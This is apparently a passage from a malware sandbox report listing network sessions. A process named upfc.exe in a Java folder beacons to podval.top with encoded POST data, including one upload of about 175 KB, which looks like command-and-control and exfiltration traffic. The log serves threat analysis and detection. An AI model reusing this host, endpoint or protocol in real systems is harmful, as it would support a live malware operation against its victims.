                                                    Data Raw: 39 38 0d 0a 09 1a 25 58 25 03 21 10 25 0c 0a 09 2d 3e 24 08 3c 04 3b 01 3b 17 04 04 3f 27 29 5a 3a 00 0c 51 23 29 35 05 3c 02 28 16 32 0e 24 1e 22 31 20 5b 04 1c 23 11 28 04 03 13 3f 38 01 53 25 2c 2d 46 33 19 13 10 27 02 25 0c 33 06 06 04 3c 28 2a 0e 33 0c 3f 5a 3d 5e 2e 5f 28 27 25 02 35 24 21 54 02 13 22 54 33 04 35 54 20 56 3c 0f 25 09 29 16 30 1a 01 51 24 23 0b 0a 29 1d 2e 54 24 57 38 11 36 3f 09 1f 33 3b 39 04 27 2d 03 59 21 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%X%!%->$<;;?')Z:Q#)5<(2$"1 [#(?8S%,-F3'%3<(*3?Z=^._('%5$!T"T35T V<%)0Q$#).T$W86?3;9'-Y!(#_+)V3YT0
                                                    Jul 3, 2024 16:44:04.276415110 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:04.376106024 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:04.708268881 CEST728INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Z8%2Bv0DMKHVz9mKb4D2JXJRMeYALlpi0dVDC3fZ%2FMh5vmc9MRbW9t%2FdPP9y2k9nLdox9MeRrs3yX5Bx6CSzFOoJ%2FA9dzPazr2rwAM%2BE7AAmH9NoBn1NsdGrOKB5T"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6c70ffb42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 14 25 3a 03 13 32 0c 20 0a 2d 03 3f 1b 3c 2d 23 05 3b 07 35 19 2b 37 3a 03 2d 2e 03 0c 22 2a 3d 02 3f 2c 0a 16 26 0e 01 08 22 21 20 5b 04 1c 20 04 2b 2a 32 06 3f 3b 27 1e 32 3c 2d 08 25 37 36 03 24 5d 39 0f 27 01 3b 5b 3d 2b 2a 0c 27 22 3c 03 3e 06 2a 5f 2b 27 07 03 22 0e 21 54 02 13 22 51 33 3d 17 11 34 20 34 0c 25 1e 3e 04 30 0a 23 1b 24 23 2a 1f 3e 55 22 55 26 32 34 1e 23 3f 0d 55 27 2b 21 06 27 03 25 5a 21 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a
                                                    Data Ascii: 98%%:2 -?<-#;5+7:-."*=?,&"! [ +*2?;'2<-%76$]9';[=+*'"<>*_+'"!T"Q3=4 4%>0#$#*>U"U&24#?U'+!'%Z!#_+)V3YT
                                                    Jul 3, 2024 16:44:05.854451895 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:06.074498892 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:06.401403904 CEST718INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:06 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2mKOp4adA2Y0rOxbrNaXLQnYkHk4zF5WGraBtEzWI0JtERxBYuaPZEaRy66RQxRWngs8QHs4LvV9bxHw9eCQ8zVtZDtyiXJ5BpcCrjAt2XINgF6fspPQ7E4iv92J"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6d17b2542fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 14 26 14 00 03 32 32 37 19 2d 13 0d 19 2b 3d 24 1b 2c 00 2d 5b 2b 27 25 11 2d 07 22 52 23 14 35 04 3c 3c 2f 07 32 1e 27 0f 23 31 20 5b 04 1c 23 11 28 04 0f 5f 2b 16 24 0c 26 2f 21 43 33 37 35 11 24 2b 32 56 24 5e 23 5a 28 38 3e 0f 24 21 23 11 3d 38 3d 07 3f 27 2d 06 21 0e 21 54 02 13 22 51 24 04 3d 56 23 56 24 0d 25 30 21 5d 24 0a 2b 1b 25 33 2a 1d 3d 33 2a 53 24 08 28 5a 21 11 02 0c 27 01 25 04 24 2e 26 02 35 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a
                                                    Data Ascii: 98%&227-+=$,-[+'%-"R#5<</2'#1 [#(_+$&/!C375$+2V$^#Z(8>$!#=8=?'-!!T"Q$=V#V$%0!]$+%3*=3*S$(Z!'%$.&5#_+)V3YT
                                                    Jul 3, 2024 16:44:06.869473934 CEST272OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 174868
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:06.967807055 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:07.880018950 CEST576INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0UReaAjVDBpdUlCsBG5Zu0vlOLzC0fWaADsyuMAO9SoJHtS6Fv43Px9zwlw49PYThg5No3D2KYD8wq54FpfME8jENaQfSkozDP%2FjcKFsFdtJk9sXqUJNVrCysiUX"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6d738f142fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0
                                                    Jul 3, 2024 16:44:08.964087009 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:09.070147038 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:09.411777973 CEST737INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYxHGURLrRr%2BKpyuwi%2F2i9et1V3lf6%2BAWvrq2YoW06mipJHoBsU0KlCSmL6P2MKrCdlY%2FSYkWocCoY0OiU2rpR%2FSDTjK3YwQ4PZOYtrd6RC%2FvYESvCjVjQ7k9YFl"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6e45e9d42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 00 27 29 29 5b 31 0b 20 0c 2d 2d 01 53 3c 2d 34 58 2c 5f 32 07 3f 37 22 01 2e 00 0b 0c 37 29 21 06 2a 3f 2c 15 26 0e 0e 54 22 1b 20 5b 04 1c 23 5d 3f 39 21 5a 3c 3b 37 1c 31 2f 35 08 33 37 35 5c 30 3b 39 0a 30 28 27 59 3d 2b 25 56 33 32 0d 1e 3e 3b 3a 58 2b 51 25 03 22 34 21 54 02 13 21 0f 24 13 32 0b 34 0e 3f 57 25 56 36 07 33 34 05 1b 24 33 35 0f 29 23 2a 1d 30 32 3b 05 21 3f 37 1e 30 38 25 02 27 13 29 58 35 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&'))[1 --S<-4X,_2?7".7)!*?,&T" [#]?9!Z<;71/5375\0;90('Y=+%V32>;:X+Q%"4!T!$24?W%V634$35)#*02;!?708%')X5#_+)V3YT0
                                                    Jul 3, 2024 16:44:10.418082952 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:10.517961979 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:10.854902983 CEST739INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtJbgO0QizYMPl8%2BiKSdX0FjlyNbg%2BLSOAZkpUyfoqalnyFu7nqbd2D05wWp%2Bbs%2F%2Ffwvrl8Z6hOmiUI9GJvzGUld4LpxFuX%2F9PC2zCHfyWp3ZUN%2B%2B8F2MFmYUbkw"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6ed680942fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 04 25 04 3e 03 32 0b 33 51 39 04 3b 53 28 13 06 5f 2f 29 07 5c 3c 1a 0f 13 2c 3e 04 50 37 39 21 05 2b 5a 24 59 31 30 3c 55 21 0b 20 5b 04 1c 20 02 3e 2a 0f 5a 2b 06 2c 0a 25 02 3d 40 25 27 35 13 27 05 2a 1e 25 3b 23 5a 3c 16 2a 0d 27 22 02 04 3d 38 08 5b 3c 37 04 10 35 0e 21 54 02 13 22 56 27 5b 35 52 23 20 2b 57 32 23 35 58 30 42 27 55 33 33 00 1d 2a 0a 25 0f 27 22 23 05 23 3f 27 53 30 01 3d 03 27 2d 31 5b 21 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&%>23Q9;S(_/)\<,>P79!+Z$Y10<U! [ >*Z+,%=@%'5'*%;#Z<*'"=8[<75!T"V'[5R# +W2#5X0B'U33*%'"##?'S0='-1[!#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    113192.168.2.1049831188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:35.362921000 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:35.713529110 CEST1060OUTData Raw: 5f 52 5f 5f 5e 5b 57 50 58 56 55 51 50 5e 59 52 55 51 5e 5f 51 54 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _R__^[WPXVUQP^YRUQ^_QTSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X'9C':']'#8)-1R4-::-0%Y$W/' "08,"['$Y
                                                    Jul 3, 2024 16:43:35.836013079 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:36.166126966 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dzBFvkv7uUsyOeM8QgDTPunmMk3fZSebtiLi7BFpqAV%2B6UAprPxu%2FTJ5RC6XRly2LRhbcvLnPbWH1tpg9fhy91AJDueE09aaq5QdmbMVbOw1rumWHbym6A%2FIkXIH"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a614acf54357-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    114192.168.2.1049832188.114.97.380
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:35.789969921 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1080
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:36.136384964 CEST1080OUTData Raw: 5a 55 5a 5b 5b 5c 57 5e 58 56 55 51 50 50 59 5a 55 5c 5e 5f 51 59 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZUZ[[\W^XVUQPPYZU\^_QYSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&:0E&)/$+)X6 [=->Z0&%#,X'Z#2+,<"['$Y
                                                    Jul 3, 2024 16:43:36.248568058 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:36.458760023 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SnSSO%2BvW9oTnMvjbZXwugHYg211a0Dvp7Y6EISQ4BrryoZo8fz78JY%2FU62WQfTqg3gFm44ee2%2FMQGq%2BMNPNNteqX%2BenD3ipHI6EkpABeQhRjW7sgAYWYhC8ijBbg"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6174fdd8c06-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0
                                                    Jul 3, 2024 16:44:07.541932106 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:07.652662039 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:07.652918100 CEST1772OUTData Raw: 5a 52 5a 5e 5b 5c 57 59 58 56 55 51 50 58 59 5b 55 51 5e 55 51 5b 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZRZ^[\WYXVUQPXY[UQ^UQ[SYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z&0@&9'_'0#_).67"-9$!]$U3/X( Z8<"['$Y !
                                                    Jul 3, 2024 16:44:07.951291084 CEST733INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DB%2BrhvDg1B%2FJ6bul%2BnIFLEbMrESXiz9Seirh2PhCrW5ZpszNfCw4GY9HlpCY1X6sRKyOCpNdWsVh8uStuCAPnr971%2B29I5zwR4oXrhrL3fc%2BorD7lR25U2iTRsKW"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6db89d48c06-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 00 32 04 22 05 32 31 2b 54 2d 04 23 50 3f 04 34 5e 2d 39 25 19 2b 42 35 1e 2d 00 00 1b 20 39 3e 5b 3f 02 30 5d 31 09 20 55 22 21 20 5b 04 1c 20 00 28 39 22 01 2b 16 24 0c 25 5a 35 47 33 0e 3e 02 33 3b 2e 52 27 38 38 00 3c 3b 22 0e 30 1c 3c 04 2a 3b 3d 02 3f 24 25 01 36 0e 21 54 02 13 21 0f 24 2d 35 56 21 20 23 1e 25 33 2a 04 30 0a 28 09 24 30 2d 0f 28 33 29 0e 33 21 15 02 35 06 2b 57 33 06 3d 05 33 2e 3d 5d 21 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&2"21+T-#P?4^-9%+B5- 9>[?0]1 U"! [ (9"+$%Z5G3>3;.R'88<;"0<*;=?$%6!T!$-5V! #%3*0($0-(3)3!5+W3=3.=]!(#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    115192.168.2.1049833188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:36.295356035 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:36.654476881 CEST1060OUTData Raw: 5f 52 5f 5b 5e 5f 52 5b 58 56 55 51 50 5e 59 50 55 5e 5e 5a 51 5d 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _R_[^_R[XVUQP^YPU^^ZQ]SYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!10D39%07Z)>" =%\9.Z0=]'/>#4(_;<"['$Y
                                                    Jul 3, 2024 16:43:36.750652075 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:37.085961103 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=86THd6jlcEm8Ql4LFyQn9F1J%2B3YAoE7XJ%2BTOhiESYACu9FGCVTP427BMqzO9iZKHO4St0ShPPtoPawxGy1pQ9LQrwsPEv4yIb%2BID4BmcIZlCWTZHr59KphHUw8q2"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a61a69d01799-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    116192.168.2.1049834188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:37.253112078 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:37.604202986 CEST1060OUTData Raw: 5f 56 5f 5e 5e 5f 57 5b 58 56 55 51 50 51 59 5b 55 50 5e 54 51 58 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_^^_W[XVUQPQY[UP^TQXSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%($)]$#]==)V .9[.-=\35.' 0->77?/"['$Y
                                                    Jul 3, 2024 16:43:37.692255020 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:38.024578094 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rwmb7DVjUow22rXKIdgSFv6Wcp5VBkgQudB4H1PoZkCD63Xk4YMU8LbdVAoZHEj112zmqI4yRfWA6cjD4ILoRxMXfyt%2B%2FEwPV%2Fn4MIA0Qp8VvftjoeByAELQ4fCe"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6204eda42f8-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    117192.168.2.1049835188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:38.153502941 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:38.510221958 CEST1060OUTData Raw: 5a 51 5f 5a 5e 58 52 5c 58 56 55 51 50 58 59 52 55 59 5e 5b 51 5b 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZQ_Z^XR\XVUQPXYRUY^[Q[SYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[':8C$'' ?Z).#-1,.*'5\'0,;4 1#,<"['$Y !
                                                    Jul 3, 2024 16:43:38.644229889 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:38.977206945 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:38 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXtLSXH89hgh%2FR8sJWA2Yrzx8ZGuOLG2JTbDgsanJkhv%2FanfWr5v68uP03Ju4E7%2BlziGcVTK2xNd8nO01TyajbavlYizW1X2gEhApVERl9c4eozVl6QShbvIZRF9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6263bf142d0-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    118192.168.2.1049836188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:39.108735085 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:39.463613033 CEST1060OUTData Raw: 5f 54 5f 54 5b 5d 52 58 58 56 55 51 50 50 59 51 55 51 5e 59 51 5d 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
